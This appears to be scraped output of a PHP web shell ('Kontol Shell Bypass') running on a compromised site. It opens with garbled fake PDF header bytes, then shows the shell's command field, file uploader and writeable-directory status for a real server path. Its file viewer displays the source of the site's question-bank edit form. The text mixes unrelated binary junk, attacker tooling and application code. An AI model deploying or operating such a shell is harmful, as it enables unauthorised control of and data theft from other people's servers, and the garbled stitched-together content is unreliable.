%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/chalkbank.com/application/views/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/chalkbank.com/application/views/edit_question_1.php
   <div class="main-wapper-inner">
 <div class="top-menus">
 <div class="container-fluid">
   <div class="row">
		<div class="col-lg-12">
			<h3><?php echo $title;?></h3>
		</div><!-- /input-group -->
	</div>
  </div><!-- /.col-lg-6 -->
</div>
<div class="home-inners">
<div class="container-fluid">
 <div class="row">
   <form method="post" action="<?php echo site_url('qbank/edit_question_1/'.$question['qid']);?>">
    <div class="col-md-9">
	  <div class="form-submit"> 
	    <?php 
		if($this->session->flashdata('message')){
			echo $this->session->flashdata('message');	
		}
		?>	
		<div class="form-group">	 
			<?php echo $this->lang->line('multiple_choice_single_answer');?>
		</div>
		<div class="form-group">	 
			<label   ><?php echo $this->lang->line('select_category');?> <span style="color:red;">*</span></label> 
			<select class="form-control" name="cid" id="cid" onchange="javascript:level_list();" required>
			<option value=""><?php echo $this->lang->line('select_category');?></option>
			<?php foreach($category_list as $key => $val){ ?>
				<option value="<?php echo $val['cid'];?>"  <?php if($question['cid']==$val['cid']){ echo 'selected'; } ?> ><?php echo $val['category_name'];?></option>
			<?php } ?>
			</select>
		</div>
		<div class="form-group">	 
			<label   ><?php echo $this->lang->line('select_level');?> <span style="color:red;">*</span></label> 
			<select class="form-control" name="lid" id="lid" required>
				<option value=""><?php echo $this->lang->line('select_level');?></option>
				<?php 
				foreach($level_list as $key => $val){
				?>
					<option value="<?php echo $val['lid'];?>" <?php if($question['lid']==$val['lid']){ echo 'selected'; } ?> ><?php echo $val['level_name'];?></option>
				<?php } ?>
			</select>
		</div>
		<div class="form-group">	 
				<label for="inputEmail"  ><?php echo $this->lang->line('question');?> <span style="color:red;">*</span></label> 
				<textarea  name="question"  class="form-control"   ><?php echo $question['question'];?></textarea>
		</div>
		<div class="form-group">	 
				<label for="inputEmail"  ><?php echo $this->lang->line('description');?></label> 
				<textarea  name="description"  class="form-control"><?php echo $question['description'];?></textarea>
		</div>
		<?php 
		foreach($options as $key => $val){
		?>
		<div class="form-group "> 
			<label for="inputEmail"  ><?php echo $this->lang->line('options');?> <?php echo ($key+1);?>)</label> <br>
			<input type="radio" name="score" value="<?php echo $key;?>" <?php if($val['score']==1){ echo 'checked'; } ?> > Select Correct Option 
			<br/><textarea  name="option[]"  class="form-control"><?php echo $val['q_option'];?></textarea>
		</div>
		<?php if(count($options)==$key+1) { ?>
			<div class="field_wrapper form-group"></div>
			<a href="javascript:void(0);" class="add_button add-new-option" title="Add field"><i class="fa fa-plus" aria-hidden="true"></i> Add Option </a>
			<input type="hidden" value="<?php echo $key+1; ?>" name="add_new" id="add_new" />
			<?php }?>
		<?php 
		}
		?>
		<div class="form-group">	 
			<label>RC Question Id(<small>If Any</small>)</label> 
			<input type="text" class="form-control" name="rc_qid" id="rc_qid" value="<?php echo $question['rc_qid']; ?>">
		</div>
		
		<div class="form-group">	 
			<label><?php echo $this->lang->line('level');?></label> 
			<select class="form-control" name="level">
			<option value="Easy" <?php if($question['level']=='Easy'){ echo 'selected'; } ?> >Easy</option>
			<option value="Medium" <?php if($question['level']=='Medium'){ echo 'selected'; } ?> >Medium</option>
			<option value="Hard" <?php if($question['level']=='Hard'){ echo 'selected'; } ?> >Hard</option>
			</select>
		</div>
 		<button class="btn btn-default button3" type="submit"><?php echo $this->lang->line('submit');?></button>
		<a class="btn btn-default button6" href="<?=base_url('qbank')?>"><?php echo $this->lang->line('cancel');?></a>
	</div>
</div>
</form>
<div class="col-md-3">
	<div class="form-group">	 
	<table class="table table-bordered">
	<tr><td><?php echo $this->lang->line('no_times_corrected');?></td><td><?php echo $question['no_time_corrected'];?></td></tr>
	<tr><td><?php echo $this->lang->line('no_times_incorrected');?></td><td><?php echo $question['no_time_incorrected'];?></td></tr>
	<tr><td><?php echo $this->lang->line('no_times_unattempted');?></td><td><?php echo $question['no_time_unattempted'];?></td></tr>

	</table>

	</div>
</div>
</div>
</div>
</div>
</div>

<script type="text/javascript">
$(document).ready(function(){
    var maxField = 10; //Input fields increment limitation
    var addButton = $('.add_button'); //Add button selector
    var wrapper = $('.field_wrapper'); //Input field wrapper
    var add_new = $('#add_new').val(); //Input field wrapper
	var x = 1; //Initial field counter is 1
	
    //Once add button is clicked
    $(addButton).click(function(){
        //Check maximum number of input fields
        if(x < maxField){ 
            var new_val = parseInt(add_new) + parseInt(x);
			var fieldHTML = '<div><label for="inputEmail" >Option '+new_val+')</label> <br><input type="radio" name="score" value=""> Select Correct Option <br/><textarea id="mce_'+new_val+'"  name="option[]"  class="form-control"></textarea><a href="javascript:void(0);" class="remove_button remove_options"><i class="fa fa-trash" aria-hidden="true"></i> Delete Option</a></div>'; //New input field html 
			x++; //Increment field counter
			$(wrapper).append(fieldHTML); //Add field html
		}
    });
    
    //Once remove button is clicked
    $(wrapper).on('click', '.remove_button', function(e){
        e.preventDefault();
        $(this).parent('div').remove(); //Remove field html
        x--; //Decrement field counter
    });
});
</script>

Kontol Shell Bypass